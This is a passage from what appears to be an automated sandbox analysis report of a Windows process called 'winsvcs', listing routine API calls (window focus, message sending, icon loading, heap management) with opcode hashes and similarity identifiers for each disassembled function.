                                                                                                                                                                                                                          • Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,00415A10,?,?,?,00000001), ref: 00416F26
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2734777837-0
                                                                                                                                                                                                                          • Opcode ID: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
                                                                                                                                                                                                                          • Instruction ID: bf3b8484ead40ab7a99336afcf803f5614de82c4d018cbf0b84b9aed1ee85005
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF418F70208200AFDF049F64D888BA67BA9FF49304F1945A9FD49CA2A6D774DC45CF25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
                                                                                                                                                                                                                          • GetFocus.USER32 ref: 00416DD9
                                                                                                                                                                                                                          • IsChild.USER32(?,00000000), ref: 00416DE3
                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00416DF2
                                                                                                                                                                                                                          • SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Focus$ChildWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 501040988-0
                                                                                                                                                                                                                          • Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
                                                                                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00423D76
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 354369530-0
                                                                                                                                                                                                                          • Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?), ref: 00411EA9
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00411EBD
                                                                                                                                                                                                                          • CallWindowProcA.USER32(?,?,?,?,?), ref: 00411ED4
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000FC), ref: 00411EEE
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00411F02
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$CallProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 513923721-0
                                                                                                                                                                                                                          • Opcode ID: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
                                                                                                                                                                                                                          • Instruction ID: f482abc3086895b13e65d7ed397f34a26d7f9aa96c4cf6a1d5cca4a790af85b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02212775508100EFCB008F18D984956BFB1FF98321B2486A6FD599A3BAC335DD52DB58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042BBEA
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __amsg_exit.LIBCMT ref: 0042BC0A
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 0042BC1A
                                                                                                                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 0042BC37
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(00449610), ref: 0042BC62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4271482742-0
                                                                                                                                                                                                                          • Opcode ID: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
                                                                                                                                                                                                                          • Instruction ID: 52685b4dcb39849911ff3693f870a45c18f8edff1e4251c2b4a25b8dbaeea7ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB01A532B00A31ABDA10AB66B80634A7360EB00720F86401FE810B3380CB28AC81DBDD
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
                                                                                                                                                                                                                            • Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2
                                                                                                                                                                                                                          • ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                          • ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2714421763-0
                                                                                                                                                                                                                          • Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F637
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F64E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F656
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F670
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F686
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
                                                                                                                                                                                                                          • Instruction ID: a6e47eae5d4f7697fc9870831a46e4352dda564a31e996fcfd64f3f94e2429e5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F037B4648300BFE3708B609C85FE777A9E784B01F109968F695966C0C6B458429B29
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction ID: 5c5ea486f8d86452672809949b6ea6ac6bdc788aae214913a2807fc9deb95fd5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b60fb91958ff4cbe69903c6e3b1af4b5bd52173b220a9b98560a312d00412668
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65E04C71299614BAF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF95C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F558
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F568
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F570
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F57C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F58B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction ID: 4336a379e938bec1e0ea5ab87b831ef1b692dabbd56aec1cc90c95ce917f6d54
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a0de6053032ffd9fb67598f8c608e6d027b0167234433cc4c673dad65eff94c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E04C712896147AF65117B05C4EFFA352DAB14B01F105420F796E91D0CAF85C42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F977
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F987
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F98F
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F99B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F9AA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction ID: 855d6a06f1f245b68fde2b1a20fd1fb7be06e334370c2da90505ec6d8b0432c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53fbb5970f05e2e839e59c08879df8115ed8b55b71e8f31e9ba4603eda203d61
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9E04CB12896147AF65117B05C4EFFA352DAB14B01F105420F792E91D0CAF85D42477D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F510
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F520
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F528
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F534
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F543
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction ID: 137df8c84f76daae2b18901c05a7a40a4d47098fd36d39e3025c756ee9ed29a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd808d9577fd7e78f5fb1443cc723e484e7eff89668d5d190c64bf5e34f6b48
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BCE042B1288304BAF65017B05C4EFBA362DA714B02F106820B792E91D1CAF8AC428B3D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F92F
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F93F
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F947
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F953
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F962
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$HandleIconLoadModule
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 604839450-0
                                                                                                                                                                                                                          • Opcode ID: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction ID: c34b6a3563cd7af2964a3b0a4b55fe3fcf32e415c952ee7c54061f4af326a4b5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5c2c5dc85593a0fc6082c8c60112313d73b4ec3fdd99b11985714131f4fe46c0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E042B1289714BAF65117B05C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F5E8
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F5F8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F600
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,0043ABC0), ref: 0040F60C
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F61B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
